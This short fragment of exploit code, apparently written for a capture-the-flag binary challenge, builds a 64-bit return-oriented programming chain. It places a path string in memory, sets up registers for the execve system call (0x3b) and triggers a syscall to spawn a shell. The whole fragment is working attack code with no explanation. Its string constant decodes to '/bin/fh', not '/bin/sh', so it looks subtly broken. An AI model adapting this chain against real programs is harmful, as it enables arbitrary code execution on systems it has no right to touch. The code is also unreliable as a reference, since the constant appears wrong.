payload = p64(0x406026)
#0x0000000000406026: pop rcx; ret; 
payload += p64(0x4b9070)+p64(0x4357c0)
# 0x00000000004357c0: pop rax; ret; 
payload += p64(0x68662f6e69622f)+p64(0x411728)
# 0x0000000000411728: mov qword ptr [rcx], rax; pop rbp; ret; 
payload += p64(0x0)+p64(0x4357c0)
# 0x00000000004357c0: pop rax; ret; 
payload += p64(0x3b)+p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x4b9070)+p64(0x43527b)
# 0x000000000043527b: pop rsi; ret; 
payload += p64(0x0)+p64(0x406505)
# 0x0000000000406505: pop rdx; ret; 
payload += p64(0x0)+p64(0x487033)
# 0x0000000000487033: syscall; 
payload += b''
